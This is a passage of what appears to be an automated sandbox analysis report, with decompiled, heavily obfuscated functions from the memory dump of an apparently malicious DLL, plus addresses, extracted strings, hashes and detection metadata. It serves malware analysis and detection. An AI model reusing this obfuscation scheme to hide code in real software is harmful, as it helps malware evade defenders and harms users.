				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = E0086F369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									E00870A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E0086C5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											E0087CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												E00870A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						E0087CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							E00870A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								E008622A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									E00870A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										E00870A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x008677ac
0x008677b4
0x008677b5
0x008677bc
0x008677be
0x008677c6
0x008677c7
0x008677cc
0x008677d7
0x008677da
0x008677e8
0x008677ef
0x008677f4
0x008677fa
0x00867802
0x0086780d
0x00867818
0x00867823
0x0086782e
0x00867836
0x00867841
0x00867849
0x0086784e
0x00867851
0x00867855
0x0086785d
0x00867865
0x0086786d
0x00867875
0x0086787d
0x00867885
0x00867889
0x0086788d
0x00867895
0x0086789d
0x008678a5
0x008678aa
0x008678b2
0x008678ba
0x008678c2
0x008678ca
0x008678d2
0x008678da
0x008678e2
0x008678ec
0x008678f0
0x008678f8
0x00867908
0x0086790c
0x00867914
0x0086791c
0x00867924
0x0086792f
0x0086793a
0x00867945
0x00867951
0x00867954
0x00867958
0x00867965
0x00867969
0x00867971
0x00867979
0x0086797e
0x00867988
0x00867990
0x00867995
0x0086799d
0x008679a5
0x008679ad
0x008679b5
0x008679bd
0x008679c5
0x008679cd
0x008679d5
0x008679dd
0x008679e5
0x008679ed
0x008679f2
0x008679fa
0x00867a02
0x00867a0a
0x00867a0f
0x00867a17
0x00867a1c
0x00867a24
0x00867a2c
0x00867a34
0x00867a3c
0x00867a44
0x00867a4c
0x00867a5b
0x00867a5e
0x00867a62
0x00867a6a
0x00867a72
0x00867a77
0x00867a7f
0x00867a87
0x00867a8f
0x00867a94
0x00867a9e
0x00867aa2
0x00867aaa
0x00867ab5
0x00867ac0
0x00867acb
0x00867ad3
0x00867adb
0x00867ae3
0x00867ae8
0x00867af0
0x00867af8
0x00867b00
0x00867b0d
0x00867b11
0x00867b19
0x00867b21
0x00867b26
0x00867b2e
0x00867b36
0x00867b3e
0x00867b46
0x00867b4b
0x00867b50
0x00867b55
0x00867b5d
0x00867b65
0x00867b71
0x00867b74
0x00867b78
0x00867b80
0x00867b88
0x00867b95
0x00867b9b
0x00867ba8
0x00867bb0
0x00867bb8
0x00867bc0
0x00867bcb
0x00867bd6
0x00867be1
0x00867bef
0x00867bf7
0x00867bfb
0x00867c03
0x00867c0b
0x00867c13
0x00867c1b
0x00867c23
0x00867c2b
0x00867c2b
0x00867c33
0x00867c33
0x00867c33
0x00867c33
0x00867c35
0x00000000
0x00000000
0x00867c3b
0x00867d45
0x00867d48
0x00000000
0x00867c41
0x00867c47
0x00867d31
0x00867d33
0x00867d36
0x00000000
0x00867c4d
0x00867c53
0x00867d1b
0x00867d20
0x00867d23
0x00000000
0x00867c59
0x00867c5f
0x00867cdf
0x00867ce0
0x00867ce4
0x00867ce9
0x00867cec
0x00867cee
0x00867cf0
0x00867cf6
0x00000000
0x00867cf6
0x00867c61
0x00867c67
0x00867cb7
0x00867cbc
0x00867cbf
0x00000000
0x00867c69
0x00867c6f
0x00000000
0x00867c75
0x00867c90
0x00867c95
0x00867c98
0x00000000
0x00867c98
0x00867c6f
0x00867c67
0x00867c5f
0x00867c53
0x00867c47
0x00000000
0x00867c3b
0x00867d52
0x00867d58
0x00867e4e
0x00867e53
0x00867e56
0x00000000
0x00867d5e
0x00867d5e
0x00867d64
0x00867e21
0x00867e26
0x00867e29
0x00000000
0x00867d6a
0x00867d6a
0x00867d6c
0x00867dee
0x00867df3
0x00867df6
0x00000000
0x00867d6e
0x00867d6e
0x00867d74
0x00867dca
0x00867dcf
0x00867dd2
0x00000000
0x00867d76
0x00867d76
0x00867d7c
0x00000000
0x00867d82
0x00867d9d
0x00867da2
0x00867da5
0x00000000
0x00867da5
0x00867d7c
0x00867d74
0x00867d6c
0x00867d64
0x00000000
0x00867e5b
0x00867e5b
0x00867e5b
0x00867e67
0x00867e69
0x00867e6e
0x00867e6e
0x00867e78

Strings

4-,a, xrefs: 008679DD
)uL, xrefs: 00867BE1
0i^, xrefs: 00867885
sG', xrefs: 00867849
*, xrefs: 00867BA8
[}, xrefs: 008678B2
&, xrefs: 00867C23

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: 4318af662b6e78c06b88e740affeddc325b14324a3d20a89b62c8e3ab204b247
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: FEF131B1508384DFD368CF21C48AA6BFBF1FB94318F50891DE69A86220D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00866B7A, Relevance: 9.0, Strings: 7, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00866B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_push("true");
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_pop(_t332);
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E008846BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E008807AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E0086C5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E0087C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E0086C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E00882B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}

0x00866b81
0x00866b8b
0x00866b8c
0x00866b93
0x00866b95
0x00866b96
0x00866b97
0x00866b9c
0x00866ba7
0x00866baa
0x00866bb5
0x00866bb7
0x00866bc4
0x00866bcb
0x00866bd0
0x00866bd8
0x00866be0
0x00866be8
0x00866bf0
0x00866bfe
0x00866c03
0x00866c09
0x00866c11
0x00866c19
0x00866c21
0x00866c26
0x00866c33
0x00866c36
0x00866c3a
0x00866c42
0x00866c4a
0x00866c52
0x00866c5a
0x00866c62
0x00866c72
0x00866c76
0x00866c7e
0x00866c86
0x00866c92
0x00866c97
0x00866c9d
0x00866ca2
0x00866caa
0x00866cb6
0x00866cb9
0x00866cbd
0x00866cc2
0x00866cc7
0x00866ccf
0x00866cd7
0x00866cdc
0x00866ce4
0x00866cec
0x00866cf4
0x00866cf9
0x00866cfe
0x00866d06
0x00866d0e
0x00866d13
0x00866d1b
0x00866d23
0x00866d2d
0x00866d35
0x00866d3d
0x00866d45
0x00866d4d
0x00866d55
0x00866d5d
0x00866d63
0x00866d66
0x00866d68
0x00866d6e
0x00866d7a
0x00866d7f
0x00866d85
0x00866d8d
0x00866d99
0x00866d9e
0x00866da4
0x00866dac
0x00866db4
0x00866db9
0x00866dc1
0x00866dc6
0x00866dce
0x00866dd6
0x00866dde
0x00866de3
0x00866deb
0x00866df3
0x00866e00
0x00866e01
0x00866e05
0x00866e0d
0x00866e20
0x00866e24
0x00866e2c
0x00866e34
0x00866e3c
0x00866e44
0x00866e4c
0x00866e54
0x00866e5c
0x00866e64
0x00866e6c
0x00866e74
0x00866e7c
0x00866e84
0x00866e91
0x00866e95
0x00866e9d
0x00866ea5
0x00866ead
0x00866eb5
0x00866ebd
0x00866ecb
0x0086702a
0x0086702f
0x00867034
0x0086706b
0x00867077
0x00867077
0x00867036
0x00000000
0x00867036
0x00866ed7
0x00867004
0x00000000
0x00867004
0x00866ee3
0x00866f94
0x00866f99
0x00866f9e
0x00866fa3
0x00866fb5
0x00866fb6
0x00866fbe
0x00866fc3
0x00866fc6
0x00866fca
0x00866fe8
0x00866ff6
0x00866ff9
0x00866ffc
0x00866ffc
0x00866fca
0x00866ffd
0x00000000
0x00866ffd
0x00866eef
0x00866f62
0x00866f67
0x00866f6e
0x00866f76
0x00000000
0x00866f76
0x00866ef7
0x0086705f
0x00867065
0x00000000
0x00000000
0x00000000
0x00867065
0x00866efd
0x00866f00
0x00866f02
0x00866f07
0x00866f0b
0x00866f15
0x00866f12
0x00000000
0x00000000
0x00866f14
0x00866f14
0x00866f19
0x00866f1b
0x00866f1f
0x00866f39
0x00866f39
0x00000000
0x00866f39
0x00866f21
0x00866f33
0x00866f33
0x00866f37
0x00000000
0x00000000
0x00000000
0x00866f37
0x00000000
0x00866f21
0x00867053
0x0086705a
0x00000000

Strings

0yu, xrefs: 00866B9C
@Y, xrefs: 00866CC7
8K, xrefs: 00866EAD
an, xrefs: 00866E2C
Wd, xrefs: 00866CFE
5X', xrefs: 00866D5D
Nb5, xrefs: 00866D06

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
API String ID: 0-1112794312
Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction ID: 6e10313a7d1f80c26fa48bd3f286cc546f72a5ae7b2c853a7b187b0998887dab
Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction Fuzzy Hash: 9EC112715083808FD368CF66D54AA1BBBF2FBC5748F10891DF69686261DBB28949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0087DC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0087DC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E0088298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E00862DEA(_v96,  &_v8, _v60, 0x8610a0, _v28, _v100, 0x8610a0, 0x8610a0, _v104, _v64, 0x8610a0, 0x8610a0, _v68, _v72, _v32, _v76, _v36, E0087E1F8(0x8610a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E0087FECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x886214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E008653D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x0087dc71
0x0087dc74
0x0087dc7e
0x0087dc85
0x0087dc8d
0x0087dc95
0x0087dca1
0x0087dca5
0x0087dcb0
0x0087dcb5
0x0087dcbb
0x0087dcc3
0x0087dccb
0x0087dcd7
0x0087dcdc
0x0087dce2
0x0087dcea
0x0087dcf2
0x0087dcfa
0x0087dd02
0x0087dd07
0x0087dd0f
0x0087dd17
0x0087dd1f
0x0087dd24
0x0087dd2c
0x0087dd34
0x0087dd39
0x0087dd3e
0x0087dd46
0x0087dd4e
0x0087dd56
0x0087dd5b
0x0087dd63
0x0087dd6b
0x0087dd73
0x0087dd7b
